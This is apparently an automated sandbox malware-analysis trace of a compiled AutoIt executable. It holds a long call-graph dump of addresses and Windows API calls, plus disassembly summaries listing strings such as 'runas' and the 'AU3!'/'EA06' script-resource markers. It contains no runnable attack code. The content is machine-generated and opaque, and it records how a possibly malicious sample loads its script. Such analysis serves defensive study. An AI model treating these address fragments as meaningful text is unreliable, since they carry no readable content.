95295->95425 95458 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95295->95458 95459 7ff75f1650b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95295->95459 95466 7ff75f1d8d98 49 API calls Concurrency::wait 95295->95466 95296->95254 95305 7ff75f162e2a 95304->95305 95307 7ff75f162e0d 95304->95307 95306 7ff75f162e5b IsDialogMessageW 95305->95306 95305->95307 95308 7ff75f1a9d94 GetClassLongPtrW 95305->95308 95306->95305 95306->95307 95307->95254 95308->95305 95308->95306 95309->95254 95310->95254 95311->95254 95312->95254 95314 7ff75f153c20 300 API calls 95313->95314 95324 7ff75f1520a8 95314->95324 95315 7ff75f15212d 95315->95267 95316 7ff75f19d06f 95338 7ff75f1c34e4 77 API calls 3 library calls 95316->95338 95318 7ff75f19d08d 95319 7ff75f152552 95321 7ff75f164c68 4 API calls 95319->95321 95320 7ff75f19d036 95336 7ff75f14ee20 5 API calls Concurrency::wait 95320->95336 95327 7ff75f1523cb memcpy_s 95321->95327 95323 7ff75f164c68 4 API calls 95329 7ff75f1522a5 memcpy_s 95323->95329 95324->95315 95324->95316 95324->95319 95325 7ff75f152244 95324->95325 95324->95327 95324->95329 95325->95327 95334 7ff75f151ce4 301 API calls Concurrency::wait 95325->95334 95326 7ff75f19d062 95337 7ff75f14ee20 5 API calls Concurrency::wait 95326->95337 95327->95320 95332 7ff75f1c34e4 77 API calls 95327->95332 95335 7ff75f144a60 300 API calls 95327->95335 95329->95323 95329->95327 95332->95327 95333->95269 95334->95329 95335->95327 95336->95326 95337->95316 95338->95318 95340 7ff75f1c5ba5 95339->95340 95341 7ff75f1c5be5 FindClose 95340->95341 95342 7ff75f1c5bd5 95340->95342 95344 7ff75f1c5ba9 95340->95344 95341->95344 95342->95344 95468 7ff75f147ab8 95342->95468 95344->95295 95346 7ff75f1ca680 95345->95346 95352 7ff75f1ca71a 95346->95352 95516 7ff75f14834c 95346->95516 95349 7ff75f1ca7fd 95544 7ff75f1c1864 6 API calls 95349->95544 95350 7ff75f14d4cc 48 API calls 95354 7ff75f1ca6d0 95350->95354 95352->95349 95353 7ff75f1ca6f3 95352->95353 95358 7ff75f1ca770 95352->95358 95353->95295 95525 7ff75f146838 95354->95525 95355 7ff75f1ca805 95545 7ff75f1bb334 95355->95545 95479 7ff75f14d4cc 95358->95479 95359 7ff75f1ca6e6 95359->95353 95362 7ff75f147ab8 CloseHandle 95359->95362 95362->95353 95363 7ff75f1ca7ee 95498 7ff75f1bb3a8 95363->95498 95364 7ff75f1ca7a7 95541 7ff75f1498e8 95364->95541 95367 7ff75f1ca778 95367->95363 95367->95364 95368 7ff75f1ca7b5 95371 7ff75f14e0a8 4 API calls 95368->95371 95369 7ff75f148314 CloseHandle 95370 7ff75f1ca85c 95369->95370 95370->95353 95373 7ff75f147ab8 CloseHandle 95370->95373 95372 7ff75f1ca7c2 95371->95372 95374 7ff75f1471f8 4 API calls 95372->95374 95373->95353 95375 7ff75f1ca7d3 95374->95375 95376 7ff75f1bb3a8 12 API calls 95375->95376 95377 7ff75f1ca7e0 Concurrency::wait 95376->95377 95377->95353 95377->95369 95379 7ff75f1c7e79 95378->95379 95380 7ff75f149640 4 API calls 95379->95380 95409 7ff75f1c7f55 Concurrency::wait 95379->95409 95381 7ff75f1c7ea6 95380->95381 95383 7ff75f149640 4 API calls 95381->95383 95382 7ff75f14834c 5 API calls 95384 7ff75f1c7f99 95382->95384 95385 7ff75f1c7eaf 95383->95385 95386 7ff75f14d4cc 48 API calls 95384->95386 95387 7ff75f14d4cc 48 API calls 95385->95387 95388 7ff75f1c7fab 95386->95388 95389 7ff75f1c7ebe 95387->95389 95390 7ff75f146838 16 API calls 95388->95390 95568 7ff75f1474ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95389->95568 95392 7ff75f1c7fba 95390->95392 95394 7ff75f1c7fbe GetLastError 95392->95394 95398 7ff75f1c7ff5 95392->95398 95393 7ff75f1c7ed8 95569 7ff75f147c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95393->95569 95395 7ff75f1c7fd8 95394->95395 95400 7ff75f147ab8 CloseHandle 95395->95400 95405 7ff75f1c7fe5 95395->95405 95397 7ff75f1c7f07 95397->95409 95570 7ff75f1bbdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 95397->95570 95401 7ff75f149640 4 API calls 95398->95401 95400->95405 95403 7ff75f1c8035 95401->95403 95402 7ff75f1c7f17 95404 7ff75f1c7f1b 95402->95404 95402->95409 95403->95405 95572 7ff75f1b0d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95403->95572 95407 7ff75f14ec00 4 API calls 95404->95407 95405->95295 95408 7ff75f1c7f28 95407->95408 95571 7ff75f1bbab8 8 API calls Concurrency::wait 95408->95571 95409->95382 95409->95405 95411 7ff75f1c7f31 Concurrency::wait 95411->95409 95573 7ff75f1df630 95412->95573 95416 7ff75f1df630 164 API calls 95415->95416 95418 7ff75f1df182 95416->95418 95417 7ff75f1df1cd 95417->95295 95418->95417 95669 7ff75f14ee20 5 API calls Concurrency::wait 95418->95669 95421 7ff75f14d4cc 48 API calls 95420->95421 95422 7ff75f1c63f8 95421->95422 95670 7ff75f1bbdec 95422->95670 95424 7ff75f1c6404 95424->95295 95426 7ff75f1ca680 95425->95426 95428 7ff75f14834c 5 API calls 95426->95428 95433 7ff75f1ca71a 95426->95433 95427 7ff75f1ca6f3 95427->95295 95429 7ff75f1ca6be 95428->95429 95431 7ff75f14d4cc 48 API calls 95429->95431 95430 7ff75f1ca7fd 95678 7ff75f1c1864 6 API calls 95430->95678 95434 7ff75f1ca6d0 95431->95434 95433->95427 95433->95430 95438 7ff75f1ca770 95433->95438 95436 7ff75f146838 16 API calls 95434->95436 95435 7ff75f1ca805 95441 7ff75f1bb334 4 API calls 95435->95441 95437 7ff75f1ca6e2 95436->95437 95437->95433 95439 7ff75f1ca6e6 95437->95439 95440 7ff75f14d4cc 48 API calls 95438->95440 95439->95427 95442 7ff75f147ab8 CloseHandle 95439->95442 95448 7ff75f1ca778 95440->95448 95443 7ff75f1ca7e0 Concurrency::wait 95441->95443 95442->95427 95443->95427 95450 7ff75f148314 CloseHandle 95443->95450 95444 7ff75f1ca7ee 95446 7ff75f1bb3a8 12 API calls 95444->95446 95445 7ff75f1ca7a7 95447 7ff75f1498e8 4 API calls 95445->95447 95446->95443 95449 7ff75f1ca7b5 95447->95449 95448->95444 95448->95445 95451 7ff75f14e0a8 4 API calls 95449->95451 95452 7ff75f1ca85c 95450->95452 95453 7ff75f1ca7c2 95451->95453 95452->95427 95454 7ff75f147ab8 CloseHandle 95452->95454 95455 7ff75f1471f8 4 API calls 95453->95455 95454->95427 95456 7ff75f1ca7d3 95455->95456 95457 7ff75f1bb3a8 12 API calls 95456->95457 95457->95443 95460->95283 95461->95288 95462->95288 95463->95274 95464->95296 95465->95296 95466->95295 95467->95296 95471 7ff75f1482e4 95468->95471 95476 7ff75f148314 95471->95476 95473 7ff75f1482f2 Concurrency::wait 95474 7ff75f148314 CloseHandle 95473->95474 95475 7ff75f148303 95474->95475 95477 7ff75f14833d CloseHandle 95476->95477 95478 7ff75f14832a 95476->95478 95477->95478 95478->95473 95480 7ff75f14d50b 95479->95480 95493 7ff75f14d4f2 95479->95493 95481 7ff75f14d53e 95480->95481 95482 7ff75f14d513 95480->95482 95484 7ff75f199cc4 95481->95484 95487 7ff75f14d550 95481->95487 95491 7ff75f199bbc 95481->95491 95548 7ff75f16956c 31 API calls 95482->95548 95551 7ff75f169538 31 API calls 95484->95551 95486 7ff75f14d522 95492 7ff75f14ec00 4 API calls 95486->95492 95549 7ff75f164834 46 API calls 95487->95549 95488 7ff75f199cdc 95494 7ff75f164c68 4 API calls 95491->95494 95497 7ff75f199c3e Concurrency::wait wcscpy 95491->95497 95492->95493 95493->95367 95495 7ff75f199c0a 95494->95495 95496 7ff75f14ec00 4 API calls 95495->95496 95496->95497 95550 7ff75f164834 46 API calls 95497->95550 95499 7ff75f1bb42a 95498->95499 95500 7ff75f1bb3c8 95498->95500 95501 7ff75f1bb334 4 API calls 95499->95501 95502 7ff75f1bb3d0 95500->95502 95503 7ff75f1bb41e 95500->95503 95515 7ff75f1bb410 Concurrency::wait 95501->95515 95504 7ff75f1bb3f1 95502->95504 95505 7ff75f1bb3dd 95502->95505 95559 7ff75f1bb458 8 API calls 95503->95559 95557 7ff75f14a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95504->95557 95555 7ff75f14a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95505->95555 95509 7ff75f1bb3e2 95556 7ff75f164120 6 API calls 95509->95556 95510 7ff75f1bb3f6 95558 7ff75f1bb270 6 API calls 95510->95558 95513 7ff75f1bb3ef 95552 7ff75f1bb384 95513->95552 95515->95377 95517 7ff75f164c68 4 API calls 95516->95517 95518 7ff75f148363 95517->95518 95519 7ff75f148314 CloseHandle 95518->95519 95520 7ff75f14836f 95519->95520 95521 7ff75f149640 4 API calls 95520->95521 95522 7ff75f148378 95521->95522 95523 7ff75f148314 CloseHandle 95522->95523 95524 7ff75f148380 95523->95524 95524->95350 95526 7ff75f148314 CloseHandle 95525->95526 95527 7ff75f14685a 95526->95527 95528 7ff75f14687d CreateFileW 95527->95528 95529 7ff75f18caa8 95527->95529 95534 7ff75f1468ab 95528->95534 95530 7ff75f18caae CreateFileW 95529->95530 95537 7ff75f1468d9 95529->95537 95531 7ff75f18cae6 95530->95531 95530->95534 95562 7ff75f146a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95531->95562 95533 7ff75f18caf3 95533->95534 95540 7ff75f1468e4 95534->95540 95560 7ff75f1468f4 9 API calls 95534->95560 95536 7ff75f1468c1 95536->95537 95561 7ff75f146a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95536->95561 95538 7ff75f1bb334 4 API calls 95537->95538 95537->95540 95538->95540 95540->95352 95540->95359 95542 7ff75f164c68 4 API calls 95541->95542 95543 7ff75f149918 95542->95543 95543->95368 95544->95355 95563 7ff75f1bb188 95545->95563 95548->95486 95549->95486 95550->95484 95551->95488 95553 7ff75f1bb334 4 API calls 95552->95553 95554 7ff75f1bb399 95553->95554 95554->95515 95555->95509 95556->95513 95557->95510 95558->95513 95559->95515 95560->95536 95561->95537 95562->95533 95564 7ff75f1bb193 95563->95564 95565 7ff75f1bb19c WriteFile 95563->95565 95567 7ff75f1bb208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95564->95567 95565->95377 95567->95565 95568->95393 95569->95397 95570->95402 95571->95411 95572->95405 95574 7ff75f1df671 memcpy_s 95573->95574 95575 7ff75f14d4cc 48 API calls 95574->95575 95576 7ff75f1df74d 95575->95576 95641 7ff75f14e330 95576->95641 95578 7ff75f1df759 95579 7ff75f1df840 95578->95579 95580 7ff75f1df762 95578->95580 95582 7ff75f1df87d GetCurrentDirectoryW 95579->95582 95585 7ff75f14d4cc 48 API calls 95579->95585 95581 7ff75f14d4cc 48 API calls 95580->95581 95583 7ff75f1df777 95581->95583 95584 7ff75f164c68 4 API calls 95582->95584 95586 7ff75f14e330 4 API calls 95583->95586 95587 7ff75f1df8a7 GetCurrentDirectoryW 95584->95587 95588 7ff75f1df85c 95585->95588 95589 7ff75f1df783 95586->95589 95590 7ff75f1df8b5 95587->95590 95591 7ff75f14e330 4 API calls 95588->95591 95592 7ff75f14d4cc 48 API calls 95589->95592 95593 7ff75f1df8f0 95590->95593 95654 7ff75f15f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95590->95654 95594 7ff75f1df868 95591->95594 95595 7ff75f1df798 95592->95595 95601 7ff75f1df905 95593->95601 95602 7ff75f1df901 95593->95602 95594->95582 95594->95593 95597 7ff75f14e330 4 API calls 95595->95597 95599 7ff75f1df7a4 95597->95599 95598 7ff75f1df8d0 95655 7ff75f15f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95598->95655 95604 7ff75f14d4cc 48 API calls 95599->95604 95657 7ff75f1bfddc 8 API calls 95601->95657 95607 7ff75f1dfa0f CreateProcessW 95602->95607 95608 7ff75f1df972 95602->95608 95609 7ff75f1df7b9 95604->95609 95605 7ff75f1df8e0 95656 7ff75f15f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95605->95656 95606 7ff75f1df90e 95658 7ff75f1bfca8 8 API calls 95606->95658 95628 7ff75f1df9b4 95607->95628 95660 7ff75f1ad1f8 99 API calls 95608->95660 95613 7ff75f14e330 4 API calls 95609->95613 95615 7ff75f1df7c5 95613->95615 95614 7ff75f1df926 95659 7ff75f1bfafc 8 API calls ~SyncLockT 95614->95659 95617 7ff75f1df806 GetSystemDirectoryW 95615->95617 95620 7ff75f14d4cc 48 API calls 95615->95620 95619 7ff75f164c68 4 API calls 95617->95619 95618 7ff75f1df94f 95618->95602 95622 7ff75f1df830 GetSystemDirectoryW 95619->95622 95621 7ff75f1df7e1 95620->95621 95623 7ff75f14e330 4 API calls 95621->95623 95622->95590 95625 7ff75f1df7ed 95623->95625 95624 7ff75f1dfabe CloseHandle 95626 7ff75f1dfaf5 95624->95626 95627 7ff75f1dfacc 95624->95627 95625->95590 95625->95617 95630 7ff75f1dfafe 95626->95630 95634 7ff75f1dfb26 CloseHandle 95626->95634 95661 7ff75f1bf7dc 95627->95661 95628->95624 95631 7ff75f1dfa64 95628->95631 95637 7ff75f1dfaa3 95630->95637 95633 7ff75f1dfa84 GetLastError 95631->95633 95633->95637 95634->95637 95645 7ff75f1bf51c 95637->95645 95642 7ff75f14e342 95641->95642 95643 7ff75f164c68 4 API calls 95642->95643 95644 7ff75f14e361 wcscpy 95643->95644 95644->95578 95646 7ff75f1bf7dc CloseHandle 95645->95646 95647 7ff75f1bf52a 95646->95647 95666 7ff75f1bf7b8 95647->95666 95650 7ff75f1bf7b8 ~SyncLockT CloseHandle 95651 7ff75f1bf53c 95650->95651 95652 7ff75f1bf7b8 ~SyncLockT CloseHandle 95651->95652 95653 7ff75f1bf545 95652->95653 95653->95295 95654->95598 95655->95605 95656->95593 95657->95606 95658->95614 95659->95618 95660->95628 95662 7ff75f1bf7b8 ~SyncLockT CloseHandle 95661->95662 95663 7ff75f1bf7ee 95662->95663 95664 7ff75f1bf7b8 ~SyncLockT CloseHandle 95663->95664 95665 7ff75f1bf7f7 95664->95665 95667 7ff75f1bf533 95666->95667 95668 7ff75f1bf7c9 CloseHandle 95666->95668 95667->95650 95668->95667 95669->95417 95673 7ff75f1bc7c0 lstrlenW 95670->95673 95674 7ff75f1bbdf5 95673->95674 95675 7ff75f1bc7dd GetFileAttributesW 95673->95675 95674->95424 95675->95674 95676 7ff75f1bc7eb FindFirstFileW 95675->95676 95676->95674 95677 7ff75f1bc7ff FindClose 95676->95677 95677->95674 95678->95435 95679 7ff75f152bf8 95682 7ff75f14ed44 95679->95682 95681 7ff75f152c05 95683 7ff75f14ed75 95682->95683 95690 7ff75f14edcd 95682->95690 95684 7ff75f153c20 300 API calls 95683->95684 95683->95690 95686 7ff75f14eda8 95684->95686 95688 7ff75f14edfe 95686->95688 95691 7ff75f14ee20 5 API calls Concurrency::wait 95686->95691 95687 7ff75f19a636 95688->95681 95690->95688 95692 7ff75f1c34e4 77 API calls 3 library calls 95690->95692 95691->95690 95692->95687 95693 7ff75f145dec 95694 7ff75f145df4 95693->95694 95695 7ff75f145e98 95694->95695 95696 7ff75f145e28 95694->95696 95734 7ff75f145e96 95694->95734 95698 7ff75f145e9e 95695->95698 95699 7ff75f18c229 95695->95699 95700 7ff75f145f21 PostQuitMessage 95696->95700 95701 7ff75f145e35 95696->95701 95697 7ff75f145e6b DefWindowProcW 95722 7ff75f145e7c 95697->95722 95705 7ff75f145ecc SetTimer RegisterWindowMessageW 95698->95705 95706 7ff75f145ea5 95698->95706 95749 7ff75f15ede4 8 API calls 95699->95749 95700->95722 95702 7ff75f18c2af 95701->95702 95703 7ff75f145e40 95701->95703 95761 7ff75f1ba40c 16 API calls memcpy_s 95702->95761 95707 7ff75f145e49 95703->95707 95708 7ff75f145f2b 95703->95708 95709 7ff75f145efc CreatePopupMenu 95705->95709 95705->95722 95712 7ff75f145eae KillTimer 95706->95712 95713 7ff75f18c1b8 95706->95713 95720 7ff75f145f0b 95707->95720 95721 7ff75f145e5f 95707->95721 95707->95734 95739 7ff75f164610 95708->95739 95709->95722 95711 7ff75f18c255 95750 7ff75f162c44 47 API calls Concurrency::wait 95711->95750 95735 7ff75f145d88 95712->95735 95717 7ff75f18c1f7 MoveWindow 95713->95717 95718 7ff75f18c1bd 95713->95718 95714 7ff75f18c2c3 95714->95697 95714->95722 95717->95722 95723 7ff75f18c1c2 95718->95723 95724 7ff75f18c1e4 SetFocus 95718->95724 95747 7ff75f145f3c 26 API calls memcpy_s 95720->95747 95721->95697 95731 7ff75f145d88 Shell_NotifyIconW 95721->95731 95723->95721 95727 7ff75f18c1cb 95723->95727 95724->95722 95748 7ff75f15ede4 8 API calls 95727->95748 95729 7ff75f145f1f 95729->95722 95732 7ff75f18c280 95731->95732 95751 7ff75f146258 95732->95751 95734->95697 95736 7ff75f145de4 95735->95736 95737 7ff75f145d99 memcpy_s 95735->95737 95746 7ff75f147098 DeleteObject DestroyWindow Concurrency::wait 95736->95746 95738 7ff75f145db8 Shell_NotifyIconW 95737->95738 95738->95736 95740 7ff75f1646db 95739->95740 95741 7ff75f16461a memcpy_s 95739->95741 95740->95722 95762 7ff75f1472c8 95741->95762 95743 7ff75f1646a2 KillTimer SetTimer 95743->95740 95744 7ff75f164660 95744->95743 95745 7ff75f1aaaa1 Shell_NotifyIconW 95744->95745 95745->95743 95746->95722 95747->95729 95748->95722 95749->95711 95750->95721 95752 7ff75f146287 memcpy_s 95751->95752 95786 7ff75f1461c4 95752->95786 95755 7ff75f14632d 95757 7ff75f14634e Shell_NotifyIconW 95755->95757 95758 7ff75f18c644 Shell_NotifyIconW 95755->95758 95759 7ff75f1472c8 6 API calls 95757->95759 95760 7ff75f146365 95759->95760 95760->95734 95761->95714 95763 7ff75f1473bc Concurrency::wait 95762->95763 95764 7ff75f1472f4 95762->95764 95763->95744 95765 7ff75f1498e8 4 API calls 95764->95765 95766 7ff75f147303 95765->95766 95767 7ff75f147310 95766->95767 95768 7ff75f18cdfc LoadStringW 95766->95768 95769 7ff75f147cf4 4 API calls 95767->95769 95770 7ff75f18ce1e 95768->95770 95771 7ff75f147324 95769->95771 95772 7ff75f14e0a8 4 API calls 95770->95772 95773 7ff75f18ce30 95771->95773 95774 7ff75f147336 95771->95774 95780 7ff75f14734f memcpy_s wcscpy 95772->95780 95785 7ff75f147c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95773->95785 95774->95770 95775 7ff75f147343 95774->95775 95784 7ff75f147c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95775->95784 95778 7ff75f18ce3c 95779 7ff75f1471f8 4 API calls 95778->95779 95778->95780 95781 7ff75f18ce63 95779->95781 95782 7ff75f1473a3 Shell_NotifyIconW 95780->95782 95783 7ff75f1471f8 4 API calls 95781->95783 95782->95763 95783->95780 95784->95780 95785->95778 95787 7ff75f18c5f8 95786->95787 95788 7ff75f1461e0 95786->95788 95787->95788 95789 7ff75f18c602 DestroyIcon 95787->95789 95788->95755 95790 7ff75f1bad94 39 API calls wcsftime 95788->95790 95789->95788 95790->95755 95791 7ff75f1547e1 95792 7ff75f154d57 95791->95792 95796 7ff75f1547f2 95791->95796 95822 7ff75f14ee20 5 API calls Concurrency::wait 95792->95822 95794 7ff75f154d66 95823 7ff75f14ee20 5 API calls Concurrency::wait 95794->95823 95796->95794 95797 7ff75f154862 95796->95797 95798 7ff75f154df3 95796->95798 95800 7ff75f1566c0 300 API calls 95797->95800 95802 7ff75f153c80 95797->95802 95824 7ff75f1c0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95798->95824 95800->95802 95801 7ff75f153dde 95802->95801 95803 7ff75f1a05be 95802->95803 95805 7ff75f154a8f 95802->95805 95808 7ff75f164f0c 34 API calls __scrt_initialize_thread_safe_statics 95802->95808 95809 7ff75f154aa9 95802->95809 95811 7ff75f154fe7 95802->95811 95812 7ff75f1650b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 95802->95812 95816 7ff75f14e0a8 4 API calls 95802->95816 95819 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95802->95819 95820 7ff75f149640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95802->95820 95821 7ff75f155360 300 API calls Concurrency::wait 95802->95821 95825 7ff75f1c34e4 77 API calls 3 library calls 95802->95825 95826 7ff75f1c34e4 77 API calls 3 library calls 95803->95826 95805->95809 95810 7ff75f154ac0 95805->95810 95815 7ff75f19fefe 95805->95815 95807 7ff75f1a05d1 95808->95802 95809->95810 95813 7ff75f14e0a8 4 API calls 95809->95813 95814 7ff75f14e0a8 4 API calls 95811->95814 95812->95802 95813->95801 95814->95801 95817 7ff75f14e0a8 4 API calls 95815->95817 95816->95802 95817->95810 95819->95802 95820->95802 95821->95802 95822->95794 95823->95798 95824->95802 95825->95802 95826->95807

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F1437F2
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143807
                                                            • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F14388D
                                                              • Part of subcall function 00007FF75F143F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF75F1438BF,?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143FFD
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143924
                                                            • MessageBoxA.USER32 ref: 00007FF75F18B888
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F18B8E1
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F18B968
                                                            • ShellExecuteW.SHELL32 ref: 00007FF75F18B98F
                                                              • Part of subcall function 00007FF75F143B84: GetSysColorBrush.USER32 ref: 00007FF75F143B9E
                                                              • Part of subcall function 00007FF75F143B84: LoadCursorW.USER32 ref: 00007FF75F143BAE
                                                              • Part of subcall function 00007FF75F143B84: LoadIconW.USER32 ref: 00007FF75F143BC3
                                                              • Part of subcall function 00007FF75F143B84: LoadIconW.USER32 ref: 00007FF75F143BDC
                                                              • Part of subcall function 00007FF75F143B84: LoadIconW.USER32 ref: 00007FF75F143BF5
                                                              • Part of subcall function 00007FF75F143B84: LoadImageW.USER32 ref: 00007FF75F143C21
                                                              • Part of subcall function 00007FF75F143B84: RegisterClassExW.USER32 ref: 00007FF75F143C85
                                                              • Part of subcall function 00007FF75F143CBC: CreateWindowExW.USER32 ref: 00007FF75F143D0C
                                                              • Part of subcall function 00007FF75F143CBC: CreateWindowExW.USER32 ref: 00007FF75F143D5F
                                                              • Part of subcall function 00007FF75F143CBC: ShowWindow.USER32 ref: 00007FF75F143D75
                                                              • Part of subcall function 00007FF75F146258: Shell_NotifyIconW.SHELL32 ref: 00007FF75F146350
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 1593035822-3287110873
                                                            • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                            • Instruction ID: d5afdb5693716aafadf4612bdb4b5387bf1271924a2ec1250352cae4aaf49102
                                                            • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                            • Instruction Fuzzy Hash: D57116A1E1C6C796EE20FB20F8541F9A760AF81358FC80135D64D466E6EF6CE60AC731

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 352 7ff75f146580-7ff75f1465fc call 7ff75f164c68 call 7ff75f146c98 call 7ff75f165d00 359 7ff75f146737-7ff75f14673a 352->359 360 7ff75f146602-7ff75f146606 352->360 361 7ff75f18c9f5-7ff75f18c9fd call 7ff75f1c2e00 359->361 362 7ff75f146740-7ff75f146753 CreateStreamOnHGlobal 359->362 363 7ff75f18ca03-7ff75f18ca1e 360->363 364 7ff75f14660c-7ff75f146617 call 7ff75f175514 360->364 361->363 362->360 365 7ff75f146759-7ff75f146777 FindResourceExW 362->365 374 7ff75f18ca27-7ff75f18ca60 call 7ff75f146810 call 7ff75f1467d8 363->374 373 7ff75f14661b-7ff75f14664e call 7ff75f1467d8 364->373 365->360 368 7ff75f14677d 365->368 372 7ff75f18c97e-7ff75f18c991 LoadResource 368->372 372->360 375 7ff75f18c997-7ff75f18c9a8 SizeofResource 372->375 382 7ff75f1466e8 373->382 383 7ff75f146654-7ff75f14665f 373->383 385 7ff75f1466ee 374->385 394 7ff75f18ca66 374->394 375->360 378 7ff75f18c9ae-7ff75f18c9ba LockResource 375->378 378->360 381 7ff75f18c9c0-7ff75f18c9f0 378->381 381->360 382->385 386 7ff75f1466ae-7ff75f1466b2 383->386 387 7ff75f146661-7ff75f14666f 383->387 391 7ff75f1466f1-7ff75f146715 385->391 386->382 388 7ff75f1466b4-7ff75f1466cf call 7ff75f146810 386->388 392 7ff75f146670-7ff75f14667d 387->392 388->373 395 7ff75f146729-7ff75f146736 391->395 396 7ff75f146717-7ff75f146724 call 7ff75f164c24 * 2 391->396 397 7ff75f146680-7ff75f14668f 392->397 394->391 396->395 401 7ff75f146691-7ff75f146695 397->401 402 7ff75f1466d4-7ff75f1466dd 397->402 401->374 403 7ff75f14669b-7ff75f1466a8 401->403 404 7ff75f146782-7ff75f14678c 402->404 405 7ff75f1466e3-7ff75f1466e6 402->405 403->392 407 7ff75f1466aa 403->407 408 7ff75f146797-7ff75f1467a1 404->408 409 7ff75f14678e 404->409 405->401 407->386 411 7ff75f1467ce 408->411 412 7ff75f1467a3-7ff75f1467ad 408->412 409->408 411->372 413 7ff75f1467af-7ff75f1467bb 412->413 414 7ff75f1467c6 412->414 413->397 415 7ff75f1467c1 413->415 414->411 415->414
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: AU3!$EA06$SCRIPT
                                                            • API String ID: 3051347437-2925976212
                                                            • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                            • Instruction ID: c2fba8f360167dfc98863fdd0942b383656a600dbff38c29a110e2837d82082a
                                                            • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                            • Instruction Fuzzy Hash: 4591D072F0968186EF20FB21E458AFCA7A0BB85B88F894135DE5D47785EF38E405C720

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
